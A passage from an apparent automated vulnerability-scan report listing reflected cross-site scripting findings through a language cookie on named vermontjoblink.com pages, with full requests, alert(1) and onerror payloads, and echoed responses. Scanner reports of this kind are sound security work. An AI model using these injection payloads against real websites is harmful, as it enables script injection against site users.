PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Pragma: no-cache
Pragma: no-cache
Expires: 06 Nov 1994 08:49:37 GMT
Expires: {ts '2011-04-29 17:16:08'}
Content-Type: text/html; charset=UTF-8
cache-control: no-cache, no-store, must-revalidate
cache-control: no-cache, no-store, must-revalidate

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la
...[SNIP]...
<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01 Transitional//EN87B2F";ALERT(1)//9062E32D47A\">
...[SNIP]...

3.221. https://www.vermontjoblink.com/ada/mn_settings_dsp.cfm [SYSTRANLANGUAGE cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.vermontjoblink.com
Path:   /ada/mn_settings_dsp.cfm

Issue detail

The value of the SYSTRANLANGUAGE cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b8fd5"%3balert(1)//c5a2f006eb8 was submitted in the SYSTRANLANGUAGE cookie. This input was echoed as b8fd5";alert(1)//c5a2f006eb8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /ada/mn_settings_dsp.cfm HTTP/1.1
Host: www.vermontjoblink.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TEST=1; SYSTRANLANGUAGE=enb8fd5"%3balert(1)//c5a2f006eb8; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:14:54 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la
...[SNIP]...
<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01 Transitional//ENB8FD5";ALERT(1)//C5A2F006EB8\">
...[SNIP]...

3.222. https://www.vermontjoblink.com/ada/mn_settings_dsp.cfm [SYSTRANLANGUAGE cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.vermontjoblink.com
Path:   /ada/mn_settings_dsp.cfm

Issue detail

The value of the SYSTRANLANGUAGE cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dab86"><img%20src%3da%20onerror%3dalert(1)>4a24dd4153a was submitted in the SYSTRANLANGUAGE cookie. This input was echoed as dab86"><img src=a onerror=alert(1)>4a24dd4153a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /ada/mn_settings_dsp.cfm HTTP/1.1
Host: www.vermontjoblink.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TEST=1; SYSTRANLANGUAGE=endab86"><img%20src%3da%20onerror%3dalert(1)>4a24dd4153a; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:14:47 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="endab86"><img src=a onerror=alert(1)>4a24dd4153a">
...[SNIP]...

3.223. https://www.vermontjoblink.com/ada/mn_ssncheck.cfm [SYSTRANLANGUAGE cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.vermontjoblink.com
Path:   /ada/mn_ssncheck.cfm

Issue detail

The value of the SYSTRANLANGUAGE cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 54e5b"%3balert(1)//093651f14f0 was submitted in the SYSTRANLANGUAGE cookie. This input was echoed as 54e5b";alert(1)//093651f14f0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /ada/mn_ssncheck.cfm HTTP/1.1
Host: www.vermontjoblink.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TEST=1; SYSTRANLANGUAGE=en54e5b"%3balert(1)//093651f14f0; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:14:43 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la
...[SNIP]...
<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01 Transitional//EN54E5B";ALERT(1)//093651F14F0\">
...[SNIP]...

3.224. https://www.vermontjoblink.com/ada/mn_ssncheck.cfm [SYSTRANLANGUAGE cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.vermontjoblink.com
Path:   /ada/mn_ssncheck.cfm

Issue detail

The value of the SYSTRANLANGUAGE cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload da9e7"><img%20src%3da%20onerror%3dalert(1)>3b3bc65ba7a was submitted in the SYSTRANLANGUAGE cookie. This input was echoed as da9e7"><img src=a onerror=alert(1)>3b3bc65ba7a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /ada/mn_ssncheck.cfm HTTP/1.1
Host: www.vermontjoblink.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TEST=1; SYSTRANLANGUAGE=enda9e7"><img%20src%3da%20onerror%3dalert(1)>3b3bc65ba7a; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:14:38 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="enda9e7"><img src=a onerror=alert(1)>3b3bc65ba7a">
...[SNIP]...

3.225. https://www.vermontjoblink.com/ada/mn_veterans_dsp.cfm [SYSTRANLANGUAGE cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.vermontjoblink.com
Path:   /ada/mn_veterans_dsp.cfm

Issue detail

The value of the SYSTRANLANGUAGE cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e9b46"%3balert(1)//306a24f14a3 was submitted in the SYSTRANLANGUAGE cookie. This input was echoed as e9b46";alert(1)//306a24f14a3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /ada/mn_veterans_dsp.cfm HTTP/1.1
Host: www.vermontjoblink.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TEST=1; SYSTRANLANGUAGE=ene9b46"%3balert(1)//306a24f14a3; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:14:43 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la
...[SNIP]...
<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01 Transitional//ENE9B46";ALERT(1)//306A24F14A3\">
...[SNIP]...

3.226. https://www.vermontjoblink.com/ada/mn_veterans_dsp.cfm [SYSTRANLANGUAGE cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.vermontjoblink.com
Path:   /ada/mn_veterans_dsp.cfm

Issue detail

The value of the SYSTRANLANGUAGE cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 26637"><img%20src%3da%20onerror%3dalert(1)>1d500488022 was submitted in the SYSTRANLANGUAGE cookie. This input was echoed as 26637"><img src=a onerror=alert(1)>1d500488022 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /ada/mn_veterans_dsp.cfm HTTP/1.1
Host: www.vermontjoblink.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TEST=1; SYSTRANLANGUAGE=en26637"><img%20src%3da%20onerror%3dalert(1)>1d500488022; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:14:38 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en26637"><img src=a onerror=alert(1)>1d500488022">
...[SNIP]...

3.227. https://www.vermontjoblink.com/ada/mn_warn_dsp.cfm [SYSTRANLANGUAGE cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.vermontjoblink.com
Path:   /ada/mn_warn_dsp.cfm

Issue detail

The value of the SYSTRANLANGUAGE cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 855f5"><img%20src%3da%20onerror%3dalert(1)>7bed8c41200 was submitted in the SYSTRANLANGUAGE cookie. This input was echoed as 855f5"><img src=a onerror=alert(1)>7bed8c41200 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /ada/mn_warn_dsp.cfm?def=false HTTP/1.1
Host: www.vermontjoblink.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TEST=1; SYSTRANLANGUAGE=en855f5"><img%20src%3da%20onerror%3dalert(1)>7bed8c41200; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:15:55 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en855f5"><img src=a onerror=alert(1)>7bed8c41200">
...[SNIP]...

3.228. https://www.vermontjoblink.com/ada/mn_warn_dsp.cfm [SYSTRANLANGUAGE cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.vermontjoblink.com
Path:   /ada/mn_warn_dsp.cfm

Issue detail

The value of the SYSTRANLANGUAGE cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6ec58"%3balert(1)//809999d932e was submitted in the SYSTRANLANGUAGE cookie. This input was echoed as 6ec58";alert(1)//809999d932e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /ada/mn_warn_dsp.cfm HTTP/1.1
Host: www.vermontjoblink.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TEST=1; SYSTRANLANGUAGE=en6ec58"%3balert(1)//809999d932e; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;

Response (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:15:31 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
